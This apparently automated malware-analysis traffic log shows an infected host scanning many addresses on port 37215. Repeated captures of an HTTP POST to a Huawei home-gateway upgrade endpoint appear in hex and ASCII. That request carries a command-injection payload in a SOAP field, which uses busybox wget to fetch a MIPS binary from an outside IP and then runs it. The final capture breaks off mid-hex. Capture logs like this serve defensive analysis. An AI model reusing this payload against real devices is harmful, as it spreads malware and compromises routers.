      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.217.67.243:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.216.18.122:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.65.137.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.156.2.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.5.95.27:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.146.33.61:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.48.115.112:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.204.39.157:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.151.243.47:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.159.84.236:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.119.125.65:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.32.190.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.52.124.132:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.36.237.19:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.191.130.62:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.82.197.194:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.34.153.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.161.111.157:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.213.107.178:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.203.17.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.78.143.203:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.97.204.167:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.8.18.44:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.83.169.62:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.245.113.7:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.234.8.144:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.170.6.197:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.122.73.144:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.83.160.3:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.107.44.130:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.222.126.150:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.86.216.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 197.194.97.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.82.41.215:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.33.248.144:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.252.243.195:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 156.214.164.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.148.29.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.155.138.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.14.163.154:37215
      Source: global trafficTCP traffic: 192.168.2.23:58984 -> 41.119.234.75:37215
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 